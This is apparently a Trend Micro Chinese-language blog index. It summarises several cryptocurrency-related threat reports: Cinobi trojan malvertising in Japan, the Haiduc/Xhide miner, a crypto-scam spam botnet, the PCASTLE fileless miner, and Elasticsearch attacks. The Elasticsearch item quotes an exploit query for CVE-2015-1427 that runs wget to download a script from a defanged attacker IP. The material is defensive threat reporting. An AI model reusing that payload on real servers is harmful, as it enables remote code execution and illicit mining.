分類: 加密貨幣/虛擬貨幣/數位貨幣

Cinobi 銀行木馬利用日本色情動畫遊戲等惡意廣告,攻擊加密貨幣交易所用戶

趨勢科技 TrendMicro

趨勢科技發現了一起新的社交工程(social engineering )惡意廣告攻擊,此攻擊瞄準了日本,並會散布惡意程式。這起攻擊行動,使用者一開始會先收到惡意廣告,這些廣告會偽裝成日本色情動畫遊戲、點數回饋應用程式或影音串流軟體,引誘使用者下載,利用側載 (sideloading) 技巧來載入並執行 Cinobi 銀行木馬程式,竊取登入憑證。

我們在 先前一篇部落格中介紹了一起稱為「Operation Overtrap」的攻擊行動,專門在日本地區散播一個名為「Cinobi」的最新銀行木馬程式。這起攻擊是由一個稱為「Water Kappa」的駭客集團所發動,他們會利用垃圾郵件來散布 Cinobi 木馬程式。除此之外,也會利用 Bottle 漏洞攻擊套件來散播木馬程式,該套件收錄了 Internet Explorer 的 CVE-2020-1380CVE-2021-26411 兩個較新的漏洞,駭客利用此套件來從事惡意廣告攻擊,專門瞄準 Microsoft Internet Explorer 的使用者。根據趨勢科技在 2020 一整年以及 2021 上半年的觀察,Bottle 漏洞攻擊套件似乎不太活躍,且其攻擊流量在六月中持續減少,這很可能意味著該集團已經改用其他新的攻擊方式和技巧。

不過,趨勢科技在這段期間發現了一起專門瞄準日本的最新社交工程惡意廣告攻擊,此攻擊會散布一個偽裝成免費色情遊戲、點數回饋應用程式或影音串流軟體的惡意程式。此惡意程式會利用側載 (sideloading) 技巧來載入並執行 Cinobi 銀行木馬程式。我們認為這是 Water Kappa 集團所發動的最新攻擊,瞄準對象是 Internet Explorer 以外的瀏覽器用戶。

仔細研究這起攻擊的 Cinobi 樣本之後,我們發現它在功能上大致維持不變,但在組態設定中的攻擊目標名單上,卻增加了多個日本虛擬加密貨幣交易所網站,意味著該集團已開始使用 Cinobi 來竊取受害者的虛擬加密貨幣帳戶。 

繼續閱讀

挖礦程式使用 Haiduc 駭客工具和 Xhide 應用程式隱藏工具,暴力登入電腦與伺服器

趨勢科技 TrendMicro

趨勢科技架設的某個誘捕環境在一個遭到入侵的網站 (hxxps://upajmeter[.]com/assets/.style/min) 上偵測到虛擬加密貨幣挖礦攻擊。歹徒在該網站上插入一些指令來下載其主要指令列腳本 (shell script),也就是趨勢科技偵測到的 Trojan.SH.MALXMR.UWEJS。這個挖礦程式由多個元件所組成,包括不同的 Perl 和 Bash 腳本、二進位檔案、應用程式隱藏工具 Xhide 以及一個掃瞄工具。此挖礦程式在散布時會掃瞄電腦是否含有某些漏洞,且會利用暴力登入方式 (主要是使用預設的登入帳號和密碼) 來入侵電腦。

根據我們對該威脅的分析顯示,惡意檔案會在一天當中執行多次,定期將受感染電腦的最新狀況回報給幕後操縱 (C&C) 伺服器。感染過程當中使用的指令列腳本也會下載一些包含其掃瞄工具、執行程序隱藏工具,以及最終惡意檔案的壓縮檔。

除此之外,這項威脅還會利用一個執行程序隱藏工具來隱藏挖礦程式的二進位檔案,讓一般使用者更不容易注意到歹徒的挖礦活動,頂多只會發現電腦效能變慢,以及某些可疑的網路流量。這是歹徒用來掩蓋其掃瞄、暴力登入與挖礦活動的一種已知手法。

繼續閱讀

垃圾信夾帶山寨新聞網站連結,引導至虛擬貨幣交易詐騙網站

趨勢科技 TrendMicro

點擊偽裝成合法新聞網站和虛擬貨幣交易網頁的詐騙網站內的任何連結,都會將使用者導到虛擬貨幣交易網站的註冊頁面。該服務聲稱免費,但要求使用者在帳戶內加值250美元作為“種子資金”。

假新聞網站
垃圾郵件連結會將受害者導到偽裝的新聞網站 點擊詐騙新聞網站內的任何連結都會將使用者導到虛擬貨幣交易網站的註冊頁面。該服務聲稱免費,但要求使用者在帳戶內加值250美元作為“種子資金”。

垃圾郵件使用PHP函式作為持續性機制,利用受感染裝置發送惡意連結

趨勢科技的蜜罐系統偵測到一波垃圾郵件,會利用受感染裝置來攻擊有漏洞的網頁伺服器。利用暴力破解攻擊弱帳密的裝置後,攻擊者將它們當作代理程式來將base64編碼的PHP腳本轉發到網頁伺服器。該腳本會將內嵌詐騙網站連結的電子郵件寄送給特定目標。

雖然我們發現的部分樣本是垃圾郵件或是將使用者重新導到虛擬貨幣詐騙網站,但垃圾郵件殭屍網路(botnet)可能會被用來將散播惡意軟體到更多系統或有漏洞的伺服器。因為是透過受感染裝置來發送惡意連結,如果出現更大規模的攻擊會很難找出幕後組織或攻擊者。此外,使用PHP web shell和函式不僅可以進行入侵和感染 – 還可以讓攻擊者在漏洞被修補後還能再次存取伺服器。

A close up of a device Description automatically generated

圖1. 垃圾郵件活動攻擊鏈

攻擊者透過暴力破解取得裝置的SSH存取權限,接著利用端口轉發來將惡意PHP腳本發送到網頁伺服器。

繼續閱讀

PCASTLE門羅幣挖礦病毒利用無檔案技術,再次針對中國發動攻擊

趨勢科技 TrendMicro

這張圖片的 alt 屬性值為空,它的檔案名稱為 feature_cybercrime-300x300.jpg

利用PowerShell散播惡意軟體並不件新鮮事;事實上,有許多無檔案病毒(fileless malware)都使用了這種作法。我們經常會看到這類型的威脅,趨勢科技的行為監控技術也能夠加以主動偵測和封鎖。比方說我們有智慧型特徵碼能夠主動偵測惡意PowerShell腳本所建立的排程工作。我們還有網路層規則來偵測SMB漏洞攻擊、暴力破解攻擊和非法虛擬貨幣挖礦( coinmining )連線等惡意活動。

不過這些活動的突然飆升仍然並不常見。根據趨勢科技 Smart Protection Suites反饋資料顯示,最近出現了一波針對中國的攻擊。攻擊活動在5月17日發現,現在仍在進行中;在5月22日到達顛峰後就一直保持穩定。

進一步分析後讓我們認為這些都屬於同一波的攻擊活動,行為模式跟之前用混淆PowerShell腳本(名為PCASTLE)散播門羅幣挖礦病毒的攻擊類似。但前一波的攻擊已經擴散到了日本、澳洲、台灣、越南、香港和印度等其他地區。現在似乎正將目標再度針對中國,跟之前被報導的首波攻擊一樣。

這波新攻擊使用了一些新手法。首先,它用了多個進行不同工作的組件來以各種方式散播虛擬貨幣挖礦病毒。它還使用了多層的無檔案技術,透過惡意PowerShell腳本下載其他病毒(通過排程工作)並只在記憶體內執行。最終的PowerShell腳本也是在記憶體內執行,用來進行所有的惡意行為:SMB漏洞攻擊(EternalBlue(永恆之藍))、暴力破解、傳遞雜湊(pass-the-hash)攻擊及下載其他病毒。

繼續閱讀

虛擬貨幣病毒透過 Elasticsearch 舊漏洞散播

趨勢科技 TrendMicro

趨勢科技曾在蜜罐系統上發現了關於搜尋引擎 Elasticsearch (用Lucene程式庫開發的開放原始碼Java搜尋引擎)的惡意挖礦( coinmining )活動。這波攻擊利用了漏洞CVE-2015-1427(位在Groovy 腳本引擎,讓遠端攻擊者可以用特製腳本來執行任意 shell 命令)以及CVE-2014-320(Elasticsearch預設設定內的漏洞)。Elasticsearch已經不再支援有漏洞的版本。

我們在運行Elasticsearch的伺服器上發現帶有以下命令的查詢(ISC也在一篇文章中提到):

“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P

/tmp/sssooo\”).getText()”}}}”

這命令是由同個系統/攻擊主機執行,後續病毒也是放在此主機上。在本文編寫時,使用此IP的是網域matrixhazel[.]com(無法連上)。此系統安裝的是CentOS 6,同時運行了網頁伺服器和SSH伺服器。

Figure 1. GreyNoise marked the host as a known scanner

圖1、GreyNotes將此這主機標記為已知掃描器

 

要注意的是,這種攻擊並不新鮮,只是最近又重新出現。趨勢科技的Smart Protection Network 11月在多個地區偵測到虛擬貨幣挖礦病毒,包括了台灣、中國和美國。

挖礦病毒散播bash腳本update.sh的方式是先調用shell來下載並輸出成檔案“/tmp/sssooo“(因為大多數系統對/tmp的限制較少)。

這種攻擊簡單卻會對受害者產生重大的影響。一旦攻擊者可以在系統上執行任意命令,就可以提升權限,甚至將目標轉向其他系統來進一步地入侵網路。

還應該注意的是,雖然大多數案例的攻擊手法相同,但所使用的惡意檔案可能不同。在我們所分析的案例中,使用的是update.sh。一但執行腳本update.sh就會下載檔案devtoolsconfig.json。接著就會部署虛擬貨幣挖礦病毒(趨勢科技偵測為 Coinminer.Linux.MALXMR.UWEIS)。 繼續閱讀